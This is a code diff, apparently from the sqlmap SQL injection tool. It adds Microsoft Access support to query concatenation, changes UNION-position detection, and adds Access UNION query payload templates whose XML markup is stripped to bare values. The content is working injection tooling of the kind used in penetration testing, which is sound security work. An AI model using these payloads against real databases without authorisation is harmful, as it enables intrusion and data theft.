diff --git a/lib/core/agent.py b/lib/core/agent.py
index b4cf4cbba..c1ba3833d 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -500,6 +500,22 @@ class Agent:
elif fieldsNoSelect:
concatenatedQuery = "'%s'+%s+'%s'" % (kb.misc.start, concatenatedQuery, kb.misc.stop)
+ elif Backend.isDbms(DBMS.ACCESS):
+ if fieldsExists:
+ concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'&" % kb.misc.start, 1)
+ concatenatedQuery += "&'%s'" % kb.misc.stop
+ elif fieldsSelectCase:
+ concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'&(SELECT " % kb.misc.start, 1)
+ concatenatedQuery += ")&'%s'" % kb.misc.stop
+ elif fieldsSelectFrom:
+ concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'&" % kb.misc.start, 1)
+ concatenatedQuery = concatenatedQuery.replace(" FROM ", "&'%s' FROM " % kb.misc.stop, 1)
+ elif fieldsSelect:
+ concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'&" % kb.misc.start, 1)
+ concatenatedQuery += "&'%s'" % kb.misc.stop
+ elif fieldsNoSelect:
+ concatenatedQuery = "'%s'&%s&'%s'" % (kb.misc.start, concatenatedQuery, kb.misc.stop)
+
else:
concatenatedQuery = query
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 4758392f9..3bb7983a5 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -183,7 +183,7 @@ USER_AGENT_ALIASES = ( "ua", "useragent", "user-agent" )
FROM_TABLE = {
DBMS.ORACLE: " FROM DUAL",
- DBMS.ACCESS: " FROM MSysAccessObjects%00",
+ DBMS.ACCESS: " FROM MSysAccessObjects",
DBMS.FIREBIRD: " FROM RDB$DATABASE",
DBMS.MAXDB: " FROM VERSIONS",
DBMS.DB2: " FROM SYSIBM.SYSDUMMY1"
diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py
index 1796b2e21..a883d3b51 100644
--- a/lib/techniques/union/test.py
+++ b/lib/techniques/union/test.py
@@ -121,6 +121,7 @@ def __unionPosition(comment, place, parameter, value, prefix, suffix, count, whe
for position in positions:
# Prepare expression with delimiters
randQuery = randomStr(UNION_MIN_RESPONSE_CHARS)
+ phrase = "%s%s%s".lower() % (kb.misc.start, randQuery, kb.misc.stop)
randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
randQueryUnescaped = unescaper.unescape(randQueryProcessed)
@@ -134,13 +135,14 @@ def __unionPosition(comment, place, parameter, value, prefix, suffix, count, whe
removeReflectiveValues(listToStrValue(headers.headers if headers else None), \
payload, True) or "")
- if content and randQuery in content:
+ if content and phrase in content:
validPayload = payload
vector = (position, count, comment, prefix, suffix, kb.uChar, where)
if where == PAYLOAD.WHERE.ORIGINAL:
# Prepare expression with delimiters
randQuery2 = randomStr(UNION_MIN_RESPONSE_CHARS)
+ phrase2 = "%s%s%s".lower() % (kb.misc.start, randQuery2, kb.misc.stop)
randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
randQueryUnescaped2 = unescaper.unescape(randQueryProcessed2)
@@ -152,7 +154,7 @@ def __unionPosition(comment, place, parameter, value, prefix, suffix, count, whe
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "")
- if content and ((randQuery in content and randQuery2 not in content) or (randQuery not in content and randQuery2 in content)):
+ if content and ((randQuery in content and phrase2 not in content) or (randQuery not in content and phrase2 in content)):
vector = (position, count, comment, prefix, suffix, kb.uChar, PAYLOAD.WHERE.NEGATIVE)
unionErrorCase = kb.errorIsNone and wasLastRequestDBMSError()
diff --git a/xml/payloads.xml b/xml/payloads.xml
index 426dd4d89..a5af03428 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -2893,6 +2893,402 @@ Formats:
+
+ Microsoft Access UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)
+ 3
+ 1
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ [CHAR]
+ [COLSTART]-[COLSTOP]
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)
+ 3
+ 1
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ NULL
+ [COLSTART]-[COLSTOP]
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)
+ 3
+ 3
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ [RANDNUM]
+ [COLSTART]-[COLSTOP]
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query ([CHAR]) - 1 to 10 columns
+ 3
+ 1
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ [CHAR]
+ 1-10
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query (NULL) - 1 to 10 columns
+ 3
+ 1
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ NULL
+ 1-10
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query ([RANDNUM]) - 1 to 10 columns
+ 3
+ 3
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ [RANDNUM]
+ 1-10
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query ([CHAR]) - 11 to 20 columns
+ 3
+ 2
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ [CHAR]
+ 11-20
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query (NULL) - 11 to 20 columns
+ 3
+ 2
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ NULL
+ 11-20
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query ([RANDNUM]) - 11 to 20 columns
+ 3
+ 3
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ [RANDNUM]
+ 11-20
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query ([CHAR]) - 21 to 30 columns
+ 3
+ 3
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ [CHAR]
+ 21-30
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query (NULL) - 21 to 30 columns
+ 3
+ 3
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ NULL
+ 21-30
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query ([RANDNUM]) - 21 to 30 columns
+ 3
+ 4
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ [RANDNUM]
+ 21-30
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query ([CHAR]) - 31 to 40 columns
+ 3
+ 4
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ [CHAR]
+ 31-40
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query (NULL) - 31 to 40 columns
+ 3
+ 4
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ NULL
+ 31-40
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query ([RANDNUM]) - 31 to 40 columns
+ 3
+ 5
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ [RANDNUM]
+ 31-40
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query ([CHAR]) - 41 to 50 columns
+ 3
+ 5
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ [CHAR]
+ 41-50
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query (NULL) - 41 to 50 columns
+ 3
+ 5
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ NULL
+ 41-50
+
+
+
+
+
+ Microsoft Access
+
+
+
+
+ Microsoft Access UNION query ([RANDNUM]) - 41 to 50 columns
+ 3
+ 5
+ 1
+ 1,2,3,4,5
+ 1
+ [UNION]
+
+
+ %00
+ [RANDNUM]
+ 41-50
+
+
+
+
+
+ Microsoft Access
+
+
+
Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)
3